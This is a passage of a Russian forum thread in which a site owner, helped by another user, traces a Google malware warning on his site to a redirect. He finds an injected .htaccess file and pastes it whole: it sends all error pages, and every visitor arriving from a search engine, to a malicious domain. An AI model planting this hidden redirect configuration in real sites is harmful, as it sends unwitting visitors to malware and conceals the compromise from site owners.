Большой Воронежский Форум
Страница 2 из 2
< 12
Веб-программирование>Вирус на сайте
Вадимка 00:03 31.10.2009

Сообщение от Pharmaci$t:
Дык а что тут ещё непонятного?



На твоём сайте были ссылки на эти домены и с них чтото грузилось что было расценено гуглей как вредоносный софт.

блин, ну это то мне понятно, дело то совсем не в этом... МНЕ НУЖНО НАЙТИ САМ КОД НА СВОЕМ САЙТЕ. Искал-не нашел, просил знакомых, тоже искали-не нашли... [Ответ]
Pharmaci$t 00:21 31.10.2009
Можно заюзать какойто сниффер и потом в его логах поискать обращения к искомым доменам, а когда станет ясно с какой страницы это происходит - уже думать дальше и искать в этой странице или в файлах которые она подгружает.

Смотри, вот лог открытия главной страницы:

Код:
   1         False    +0.000 s             0,344 s      GET     200     4,32 K    text/html                 http://www.kilze.ru/                                                                                                        
   2         False    +0.515 s             0,282 s      GET     200     11,70 K   text/css                  http://www.kilze.ru/templates/warrexru/style/base.css                                                                       
   3         False    +0.437 s             ******       GET             0         text/css                  http://www.kilze.ru/templates/warrexru/style/main.css                                                                       
   4         False    +0.750 s             0,422 s      GET     200     6,15 K    text/css                  http://www.kilze.ru/templates/warrexru/style/engine.css                                                                     
   5         False    +0.469 s             ******       GET             0         text/css                  http://www.kilze.ru/templates/warrexru/style/tools.css                                                                      
   6         False    +0.750 s             0,454 s      GET     200     2,34 K    text/css                  http://www.kilze.ru/templates/warrexru/style/style.css                                                                      
   7         False    +0.484 s             ******       GET             0         text/css                  http://www.kilze.ru/templates/warrexru/style/blocks.css                                                                     
   8         False    +0.797 s             0,437 s      GET     200     2,61 K    text/css                  http://www.kilze.ru/engine/ajax/menu.js                                                                                     
   9         False    +0.937 s             0,297 s      GET     200     2,79 K    text/css                  http://www.kilze.ru/templates/warrexru/style/engine.css                                                                     
   10        False    +1.219 s             0,126 s      GET     200     1,48 K    application/x-javascript  http://www.kilze.ru/engine/ajax/menu.js                                                                                     
   11        False    +1.531 s             0,095 s      GET     200     3,17 K    application/x-javascript  http://www.kilze.ru/engine/ajax/dle_ajax.js                                                                                 
   12        False    +1.656 s             0,110 s      GET     200     3,42 K    application/x-javascript  http://www.kilze.ru/engine/ajax/js_edit.js                                                                                  
   13        False    +2.625 s             ******       GET             0         image/jpeg                http://www.kilze.ru/templates/warrex...ges/hedfon.jpg                                                                    
   14        False    +2.625 s             ******       GET             0         image/x-png               http://www.kilze.ru/templates/warrexru/images/logo.png                                                                      
   15        False    +2.656 s             ******       GET             0         image/gif                 http://www.kilze.ru/templates/warrex...et_field_s.gif                                                              
   16        False    +2.687 s             ******       GET             0         image/x-png               http://www.kilze.ru/templates/warrex...ges/submit.png                                                                    
   17        False    +2.687 s             ******       GET             0         image/x-png               http://www.kilze.ru/templates/warrex...ges/why_me.png                                                                    
   18        False    +2.734 s             ******       GET             0         image/x-png               http://www.kilze.ru/templates/warrex...es/pbt_top.png                                                                   
   19        False    +2.750 s             ******       GET             0         image/x-png               http://www.kilze.ru/templates/warrex...s/pbt_left.png                                                                  
   20        False    +2.781 s             ******       GET             0         image/x-png               http://www.kilze.ru/templates/warrex.../pbt_right.png                                                                 
   21        False    +2.781 s             ******       GET             0         image/x-png               http://www.kilze.ru/templates/warrex...quick_menu.png                                                                
   22        False    +2.875 s             ******       GET             0         image/x-png               http://www.kilze.ru/templates/warrex...ges/arrows.png                                                                    
   23        False    +2.969 s             ******       GET             0         image/gif                 http://www.kilze.ru/templates/warrex...ges/spacer.gif                                                                    
   24        False    +3.234 s             ******       GET             0         image/gif                 http://www.kilze.ru/templates/warrex...fo_line_bg.gif                                                         
   25        False    +3.297 s             ******       GET             0         image/gif                 http://www.kilze.ru/templates/warrex...s/ico_user.gif                                                                  
   26        False    +3.297 s             ******       GET             0         image/gif                 http://www.kilze.ru/templates/warrex...s/ico_view.gif                                                                  
   27        False    +3.531 s             ******       GET             0         image/x-png               http://www.kilze.ru/templates/warrex...ges/search.png                                                                    
   28        False    +3.797 s             ******       GET             0         image/x-png               http://www.kilze.ru/templates/warrex...pbd_bottom.png                                                                
   29        False    +3.797 s             3,562 s      GET     200     7,87 K    image/gif                 http://www.kilze.ru/templates/warrex.../footbar_2.png                                                                 
   30        False    +3.906 s             3,719 s      GET     200     6,56 K    image/png                 http://www.kilze.ru/templates/warrex...es/footbar.png                                                                   
   31        False    +2.625 s             ******       GET             0         image/x-png               http://www.kilze.ru/templates/warrexru/images/logo2.png                                                                     
   32        False    +4.500 s             ******       GET             0         image/x-png               http://www.kilze.ru/templates/warrex...icon_login.png                                                                
   33        False    +4.500 s             ******       GET             0         image/x-png               http://www.kilze.ru/templates/warrex...es/pb_left.png                                                                   
   34        False    +4.515 s             ******       GET             0         image/x-png               http://www.kilze.ru/templates/warrex.../blocks_bg.png                                                                 
   35        False    +4.515 s             ******       GET             0         image/gif                 http://www.kilze.ru/templates/warrex...s/rss_icon.gif                                                                  
   36        False    +4.531 s             ******       GET             0         image/x-png               http://www.kilze.ru/templates/warrex...ges/rating.png                                                                 
   37        False    +4.640 s             ******       GET             0         image/gif                 http://www.kilze.ru/templates/warrex...s/ico_comm.gif                                                                  
   38        False    +4.906 s             4,845 s      GET     200     6,05 K    image/png                 http://www.kilze.ru/templates/warrex...s/pbd_left.png                                                                  
   39        False    +2.640 s             ******       GET             0         image/x-png               http://www.kilze.ru/templates/warrexru/images/login.png                                                                     
   40        False    +5.047 s             ******       GET             0         image/x-png               http://www.kilze.ru/templates/warrex...s/speedbar.png                                                                  
   41        False    +5.094 s             ******       GET             0         image/x-png               http://www.kilze.ru/templates/warrex...s/pb_right.png                                                                  
   42        False    +5.109 s             ******       GET             0         image/x-png               http://www.kilze.ru/templates/warrex...i_recomend.png                                                              
   43        False    +5.281 s             ******       GET             0         image/gif                 http://www.kilze.ru/templates/warrex...es/date-bg.gif                                                                   
   44        False    +5.297 s             ******       GET             0         image/gif                 http://www.kilze.ru/templates/warrexru/images/li.gif                                                                        
   45        False    +5.297 s             ******       GET             0         image/gif                 http://www.kilze.ru/templates/warrex...nfo_line_o.gif                                                          
   46        False    +5.297 s             1,110 s      GET     200     6,33 K    image/png                 http://www.kilze.ru/templates/warrex.../pbd_right.png                                                                 
   47        False    +4.187 s             3,250 s      GET     301     545       text/html                 http://soft4dle.ru/baner3.gif                                         http://soft4dle.com/baner3.gif                        
   48        False    +4.187 s             6,360 s      GET     200     73,86 K   image/jpeg                http://s58.radikal.ru/i161/0910/7d/8ebadb69ba70.jpg                                                                         
   49        False    +4.219 s             3,969 s      GET     302     516       text/html                 http://wwp.icq.com/scripts/online.dl...78818466&img=5             http://status.icq.com/online.gif?icq=578818466&img=5  
   50        False    +6.406 s             2,017 s      GET     302     479       text/html                 http://www.kilze.ru/templates/warrex...s/pbd_left.png            http://sockslab.net/in.cgi?8&parameter=sockslab       
   51        False    +5.469 s             5,843 s      GET     200     51,64 K   image/jpeg                http://img4.immage.de/3010c3e5361.jpeg                                                                                      
   52        False    +5.484 s             5,485 s      GET     200     18,91 K   image/jpeg                http://i066.radikal.ru/0910/2e/793a823fb14c.jpg                                                                             
   53        False    +5.500 s             5,515 s      GET     200     27,19 K   image/jpeg                http://s02.radikal.ru/i175/0910/68/75e65f678538.jpg                                                                         
   54        False    +5.656 s             5,906 s      GET     200     94,35 K   image/jpeg                http://i012.radikal.ru/0910/1f/1b599eda8b5c.jpg                                                                             
   55        False    +5.656 s             4,688 s      GET     200     24,36 K   image/jpeg                http://s52.radikal.ru/i137/0910/be/e65c263ac4b9.jpg                                                                         
   56        False    +5.781 s             4,578 s      GET     200     22,23 K   image/gif                 http://bdee.ru/uploads/fotos/button.gif                                                                                     
   57        False    +5.765 s             5,783 s      GET     200     19,13 K   image/jpeg                http://i021.radikal.ru/0910/2b/309631a1a2eb.jpg                                                                             
   58        False    +7.375 s             1,829 s      GET     200     545       image/png                 http://www.kilze.ru/templates/warrex...es/footbar.png                                                                   
   59        False    +5.937 s             4,438 s      GET     200     14,48 K   image/jpeg                http://s45.radikal.ru/i108/0910/0a/de048149a733.jpg                                                                         
   60        False    +5.953 s             4,579 s      GET     200     14,27 K   image/jpeg                http://s59.radikal.ru/i166/0910/6c/1b36d2b46c5a.jpg                                                                         
   61        False    +5.953 s             4,579 s      GET     200     38,02 K   image/jpeg                http://s59.radikal.ru/i165/0910/74/244772af80d1.jpg                                                                         
   62        False    +8.422 s             1,548 s      GET     200     1,29 K    image/gif                 http://www.kilze.ru/templates/warrex...s/ico_comm.gif                                                                  
   63        False    +9.203 s             1,156 s      GET     200     993       image/png                 http://www.kilze.ru/templates/warrex...ges/rating.png                                                                 
   64        False    +8.109 s             3,204 s      GET     200     26,22 K   image/gif                 http://soft4dle.com/baner3.gif                                                                                              
   65        False    +8.687 s             2,533 s      GET     302     486       text/html                 http://status.icq.com/online.gif?icq=578818466&img=5                  /5/online2.gif                                        
   66        False    +11.234 s            0,579 s      GET     200     467       image/gif                 http://status.icq.com/5/online2.gif                                                                                         
   67        False    +18.656 s            0,126 s      GET     404     399       text/html                 http://www.kilze.ru/favicon.ico
Обрати внимание на 50 строчку: с http://www.kilze.ru/templates/warrex...s/pbd_left.png происходит редирект на http://sockslab.net/in.cgi?8&parameter=sockslab
Это тот самый домен на который ругается гугля! Посмотри и разберись почему так происходит. [Ответ]
Вадимка 00:27 31.10.2009

Сообщение от Pharmaci$t:
Можно заюзать какойто сниффер и потом в его логах поискать обращения к искомым доменам, а когда станет ясно с какой страницы это происходит - уже думать дальше и искать в этой странице или в файлах которые она подгружает.

какой сниффер посоветуешь? [Ответ]
Pharmaci$t 00:31 31.10.2009
Хз! Самый крутой считается Wireshark но лично я в нём не разобрался, для меня он чересчур навороченный!

Тот лог что в моём сообщении это лог дампа
Http Analyzer. Может есть какието лучше, но я к этому вроде как привык и он мне нравится! [Ответ]
Вадимка 00:36 31.10.2009

Сообщение от Pharmaci$t:
Хз! Самый крутой считается Wireshark но лично я в нём не разобрался, для меня он чересчур навороченный!

Тот лог что в моём сообщении это лог дампа
Http Analyzer. Может есть какието лучше, но я к этому вроде как привык и он мне нравится!

А как Http Analyzer пользоваться? [Ответ]
Pharmaci$t 00:37 31.10.2009
Запускаешь, нажимаешь Start и юзаешь инет, все коннекты твоего компа отображаются в его логах


Изображения
[Ответ]
Вадимка 00:45 31.10.2009

Сообщение от Pharmaci$t:
Запускаешь, нажимаешь Start и юзаешь инет, все коннекты твоего компа отображаются в его логах

Вложение 583117

что самое интересное, у меня нет на сайте таких файлов, с которых идет редирект... как тут быть? [Ответ]
Pharmaci$t 00:53 31.10.2009

Сообщение от Вадимка:
что самое интересное, у меня нет на сайте таких файлов, с которых идет редирект...

Но редирект то есть! Нажми вот сюда и сам увидишь.



Так можно сделать через модрерайт, прописать в .htaccess что при обращениии к урлу такому то делать редирект на урл такой то. А больше чёто пока и никаких идей......... Там файлы .htaccess есть? Искать нужно в корне и в папках templates, templates/warrexru и templates/warrexru/images.
Изображения
[Ответ]
Вадимка 01:00 31.10.2009

Сообщение от Pharmaci$t:
Но редирект то есть! Нажми вот сюда и сам увидишь.

Вложение 583123

Так можно сделать через модрерайт, прописать в .htaccess что при обращениии к урлу такому то делать редирект на урл такой то. А больше чёто пока и никаких идей......... Там файлы .htaccess есть? Искать нужно в корне и в папках templates, templates/warrexru и templates/warrexru/images.

Зацени, что нашел в .htaccess

ErrorDocument 400 http://sockslab.net/in.cgi?8&parameter=sockslab
ErrorDocument 401 http://sockslab.net/in.cgi?8&parameter=sockslab
ErrorDocument 403 http://sockslab.net/in.cgi?8&parameter=sockslab
ErrorDocument 404 http://sockslab.net/in.cgi?8&parameter=sockslab
ErrorDocument 500 http://sockslab.net/in.cgi?8&parameter=sockslab

AddType application/x-httpd-php .php .htm .html .phtml


RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://sockslab.net/in.cgi?7&parameter=sockslab [R=301,L] [Ответ]
Pharmaci$t 01:02 31.10.2009
Ну вот и нашёл, поздравляю!

Блин, а умно сделано!
[Ответ]
Вадимка 01:04 31.10.2009

Сообщение от Pharmaci$t:
Ну вот и нашёл, поздравляю!

Интересно, еще где-нибудь редирект прописан?
Да и неплохо бы было найти редирект на x8y.ru

А что именно тут умно сделано?
[Ответ]
Pharmaci$t 01:08 31.10.2009

Сообщение от Вадимка:
Интересно, еще где-нибудь редирект прописан?
Да и неплохо бы было найти редирект на x8y.ru

Откуда же я знаю, я твой топик прочитал час назад.
Может быть там раньше он и был прописан, а потом его заабузили и тот кто это сделал сменил домен на sockslab.net, хз.

Сообщение от Вадимка:
А что именно тут умно сделано?

Ну я бы например до такого не додумался
[Ответ]
Вадимка 01:27 31.10.2009
А что в Http Analyzer означает, если строка подсвечена красным цветом? [Ответ]
Pharmaci$t 01:37 31.10.2009
404 ошибка, нет файла, в данном случае это означает что у тебя иконки на сайте нет!

Иконка должна лежать в корне и иметь название favicon.ico как например здесь
http://bvf.ru/favicon.ico По умолчанию браузер открывая сайт ищет в корне иконку.

Кстати я так подумал:

Сообщение от Вадимка:
Да и неплохо бы было найти редирект на x8y.ru

Если гугля пишет что редирект был на именно этой страничке значит он тут и был. А если сейчас его тут нет значит его удалили. [Ответ]
Вадимка 02:08 31.10.2009

Сообщение от Pharmaci$t:
404 ошибка, нет файла, в данном случае это означает что у тебя иконки на сайте нет!

Иконка должна лежать в корне и иметь название favicon.ico как например здесь
http://bvf.ru/favicon.ico По умолчанию браузер открывая сайт ищет в корне иконку.

Кстати я так подумал:


Если гугля пишет что редирект был на именно этой страничке значит он тут и был. А если сейчас его тут нет значит его удалили.

если редирект был, а сейчас уже нет, то почему гугля до сих пор при индексации ругается на него?
А ошибка 404 идет не от корня, а от шаблона. [Ответ]
Pharmaci$t 03:28 31.10.2009
Дык там же написано как:

Сообщение от :
В некоторой части этого сайта несколько раз (8) за последние 90 дней была замечена подозрительная активность

То есть на сайт будет каждый день приползать паук от гугли, индексировать его и через какоето время предупреждение в серпе исчезнет, мож через 90 дней, точно не знаю. Паука ты увидишь в статистике, там будет написано чтото типа googlebot както там......... не помню........

А ошибки в шаблоне нужно и править в шаблоне,вот я гляжу например у тебя кроме иконки нет ещё файлов

http://www.kilze.ru/templates/warrexru/style/style.css
http://www.kilze.ru/templates/warrex...s/ico_view.gif
http://www.kilze.ru/templates/warrex...s/ico_comm.gif
http://www.kilze.ru/templates/warrex...nfo_line_o.gif
http://www.kilze.ru/templates/warrex...s/pbt_left.png
http://www.kilze.ru/templates/warrex.../pbd_right.png
http://www.kilze.ru/templates/warrex...es/footbar.png

хотя ссылки на них есть......... Дружище, ну я же не Нострадамус, я хз как так у тебя получилось! Посмотри в шаблоне, были ли они там изначально, посмотри на сайтах с такими же шаблонами, может гденидь можно скопировать и залить себе, если ты примерно представляешь что там должно быть может быть можно нарисовать картинки в фотошопе и создать таблицу стилей если ты считаешь что она там тебе нужна. Или можно подредактировать шаблон и удалить ссылки на эти файлы или может быть они там неправильные и нужно их подправить......... То есть вариантов много. [Ответ]
Вадимка 12:52 31.10.2009

Сообщение от Pharmaci$t:
Дык там же написано как:

То есть на сайт будет каждый день приползать паук от гугли, индексировать его и через какоето время предупреждение в серпе исчезнет, мож через 90 дней, точно не знаю. Паука ты увидишь в статистике, там будет написано чтото типа googlebot както там......... не помню........

А ошибки в шаблоне нужно и править в шаблоне,вот я гляжу например у тебя кроме иконки нет ещё файлов

http://www.kilze.ru/templates/warrexru/style/style.css
http://www.kilze.ru/templates/warrex...s/ico_view.gif
http://www.kilze.ru/templates/warrex...s/ico_comm.gif
http://www.kilze.ru/templates/warrex...nfo_line_o.gif
http://www.kilze.ru/templates/warrex...s/pbt_left.png
http://www.kilze.ru/templates/warrex.../pbd_right.png
http://www.kilze.ru/templates/warrex...es/footbar.png

хотя ссылки на них есть......... Дружище, ну я же не Нострадамус, я хз как так у тебя получилось! Посмотри в шаблоне, были ли они там изначально, посмотри на сайтах с такими же шаблонами, может гденидь можно скопировать и залить себе, если ты примерно представляешь что там должно быть может быть можно нарисовать картинки в фотошопе и создать таблицу стилей если ты считаешь что она там тебе нужна. Или можно подредактировать шаблон и удалить ссылки на эти файлы или может быть они там неправильные и нужно их подправить......... То есть вариантов много.

да, картинки скорее всего были, скорей всего ссылки в css остались и в шаблонах tpl, просто не смотрел и править не стал, картинки удалил и все, давно это было, уже не помню. [Ответ]
Страница 2 из 2
< 12
Вверх